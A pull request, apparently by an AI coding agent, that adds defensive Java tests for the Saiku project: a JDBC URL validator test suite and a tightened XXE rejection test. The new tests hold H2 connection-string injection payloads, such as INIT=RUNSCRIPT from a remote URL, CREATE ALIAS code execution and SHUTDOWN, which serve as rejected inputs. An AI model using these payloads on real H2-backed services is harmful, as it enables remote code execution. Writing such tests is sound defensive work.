### PR TITLE
test(security): lock case-insensitive JDBC-URL RCE guard + tighten XXE negative control

### DIFF
--- a/saiku-core/saiku-service/src/test/java/org/saiku/service/util/xml/SecureXmlTest.java
+++ b/saiku-core/saiku-service/src/test/java/org/saiku/service/util/xml/SecureXmlTest.java
@@ -6,7 +6,9 @@
  */
 package org.saiku.service.util.xml;
 
+import static org.junit.Assert.assertFalse;
 import static org.junit.Assert.assertNotNull;
+import static org.junit.Assert.assertTrue;
 import static org.junit.Assert.fail;
 
 import jakarta.xml.bind.JAXBContext;
@@ -50,19 +52,28 @@ public class SecureXmlTest {
 
         JAXBContext ctx = JAXBContext.newInstance(Container.class);
         try {
-            Object result =
-                    SecureXml.secureUnmarshal(ctx, new ByteArrayInputStream(xxe.getBytes(StandardCharsets.UTF_8)));
-            // If parsing didn't blow up, the entity MUST NOT have expanded to the file contents.
-            if (result instanceof Container) {
-                String name = ((Container) result).name;
-                if (name != null && name.contains("TOP_SECRET")) {
-                    fail("XXE expansion succeeded — secure parser leaked file contents into <name>: " + name);
-                }
-            }
-        } catch (Exception expected) {
-            // Acceptable: hardened parser refuses to process DOCTYPE declarations.
-            return;
+            SecureXml.secureUnmarshal(ctx, new ByteArrayInputStream(xxe.getBytes(StandardCharsets.UTF_8)));
+            fail("secure parser must REJECT the DOCTYPE-bearing payload, not parse it");
+        } catch (Exception e) {
+            // The original test treated ANY exception as "secure" and also passed if the parse
+            // silently succeeded without leaking — so it could stay green even if the
+            // disallow-doctype-decl control broke and some unrelated error fired. Pin the
+            // mechanism instead: the secure path (disallow-doctype-decl=true) must fail BECAUSE
+            // of the DOCTYPE, and the file contents must never surface anywhere in the failure.
+            // Mirrors QueryDeserializerXxeTest's rigor on the JDOM2 parse path.
+            String trace = throwableChainText(e);
+            assertTrue(
+                    "rejection must be the disallowed DOCTYPE, was: " + trace,
+                    trace.toUpperCase(java.util.Locale.ROOT).contains("DOCTYPE"));
+            assertFalse("file contents must never appear in the failure: " + trace, trace.contains("TOP_SECRET"));
         }
+    }
+
+    /** Full message text down the cause / linked-exception chain (JAXB wraps the SAX error). */
+    private static String throwableChainText(Throwable t) {
+        java.io.StringWriter sw = new java.io.StringWriter();
+        t.printStackTrace(new java.io.PrintWriter(sw));
+        return sw.toString();
     }
 
     @Test

--- a/saiku-core/saiku-web/src/test/java/org/saiku/web/rest/objects/JdbcUrlValidatorTest.java
+++ b/saiku-core/saiku-web/src/test/java/org/saiku/web/rest/objects/JdbcUrlValidatorTest.java
@@ -79,4 +79,66 @@ public class JdbcUrlValidatorTest {
     public void acceptsNull() {
         JdbcUrlValidator.validate(null);
     }
+
+    /* ---- case / whitespace bypass class (locks the (?i) defense + untested branches) ---- */
+    //
+    // The validator's entire RCE defense is case-insensitive: the H2 sub-URL is
+    // detected via lower-cased contains("jdbc:h2:") and the dangerous tokens via
+    // (?i) regexes. Nothing locked that — every payload above is UPPERCASE — so a
+    // refactor that dropped the (?i) flags (or the lower-casing on the H2 gate)
+    // would silently reopen the admin-RCE with the suite still green. These pin
+    // the bypass class and the two previously-untested branches (CREATE FORCE,
+    // standalone RUNSCRIPT).
+
+    @Test
+    public void rejectsLowercaseH2InitRunscript() {
+        assertRejected("jdbc:h2:mem:x;init=runscript from 'http://e/p.sql'");
+    }
+
+    @Test
+    public void rejectsLowercaseH2CreateAlias() {
+        // No INIT= here, so this exercises the CREATE-ALIAS pattern itself, case-insensitively.
+        assertRejected("jdbc:h2:mem:x;create alias EXEC AS $$ String x() { return \"y\"; } $$");
+    }
+
+    @Test
+    public void rejectsUppercaseSchemeH2Init() {
+        // The H2 detection itself must be case-insensitive: an upper-cased scheme
+        // must not slip past the looksH2 gate (it lower-cases before contains()).
+        assertRejected("JDBC:H2:MEM:X;INIT=RUNSCRIPT FROM 'http://e/p.sql'");
+    }
+
+    @Test
+    public void rejectsH2InitWithWhitespaceAroundEquals() {
+        // `INIT\\s*=` tolerates padding — `INIT = RUNSCRIPT` must still be caught.
+        assertRejected("jdbc:h2:mem:x;INIT = RUNSCRIPT FROM 'http://e/p.sql'");
+    }
+
+    @Test
+    public void rejectsH2CreateForce() {
+        // CREATE FORCE is in the H2_CREATE_EXEC pattern but had no test.
+        assertRejected("jdbc:h2:mem:x;CREATE FORCE VIEW v AS SELECT 1");
+    }
+
+    @Test
+    public void rejectsH2StandaloneRunscript() {
+        // RUNSCRIPT is blocked anywhere (defence in depth), not only via INIT=.
+        assertRejected("jdbc:h2:mem:x;runscript from 'http://e/p.sql'");
+    }
+
+    @Test
+    public void rejectsLowercaseH2Shutdown() {
+        assertRejected("jdbc:h2:mem:x;shutdown");
+    }
+
+    private static void assertRejected(String url) {
+        try {
+            JdbcUrlValidator.validate(url);
+            fail("expected IllegalArgumentException for: " + url);
+        } catch (IllegalArgumentException expected) {
+            assertTrue(
+                    "rejection should identify an invalid JDBC URL, was: " + expected.getMessage(),
+                    expected.getMessage().toLowerCase().contains("jdbc url"));
+        }
+    }
 }


### PR DESCRIPTION
## What this does

Resuming the QA security-test audit (Juan's go). Two merged security tests were **green-but-loose** — they asserted less than the defense they guard. This tightens both. **Test-only, no production change.**

### `JdbcUrlValidatorTest` — lock the case-insensitive RCE guard
The validator blocks H2 `INIT=RUNSCRIPT` / `CREATE ALIAS|TRIGGER|FORCE` / `SHUTDOWN` (an admin-gated but confirmed RCE). Its **entire** defense is case-insensitive: H2 detection via `lower.contains("jdbc:h2:")` and the tokens via `(?i)` regexes. But every existing payload was **UPPERCASE**, so a refactor dropping `(?i)` or the lower-casing would silently reopen the RCE with the suite green. Adds 7 tests:
- lowercase / mixed-case `init=runscript`, `create alias`, `;shutdown`
- upper-cased `JDBC:H2:` scheme (locks the `looksH2` gate)
- `INIT = RUNSCRIPT` (whitespace around `=`)
- the previously **untested** `CREATE FORCE` and standalone `RUNSCRIPT` branches

### `SecureXmlTest` — tighten the XXE negative control
`rejects_external_entity_doctype` did `catch (Exception) { return; }` — *any* exception counted as "secure", and it also passed on a silent no-leak parse. So it could stay green even if `disallow-doctype-decl` broke and an unrelated error fired. Tightened to assert the secure path **fails because of the DOCTYPE** (throwable chain names `DOCTYPE`) **and** never surfaces the file contents — matching the rigor of `QueryDeserializerXxeTest` on the JDOM2 path. (`secureUnmarshal` uses `disallow-doctype-decl=true`, so a DOCTYPE always throws; verified the JAXB-wrapped exception trace contains `DOCTYPE`.)

## Verification
- `mvn -pl saiku-core/saiku-service,saiku-core/saiku-web -am -s <settings> -Dtest=SecureXmlTest,JdbcUrlValidatorTest test` -> **SecureXmlTest 2/0, JdbcUrlValidatorTest 15/0** (JDK 21).
- Both toothful by construction: drop `(?i)`/`lower.contains` -> JDBC tests RED; weaken `disallow-doctype` -> SecureXmlTest's `fail()` fires.
- Test-only, spotless-clean, off current `development`.

Handing to @AGENT LEAD to gate + merge — **not self-merging.**

🤖 Generated with [Claude Code](https://claude.com/claude-code)
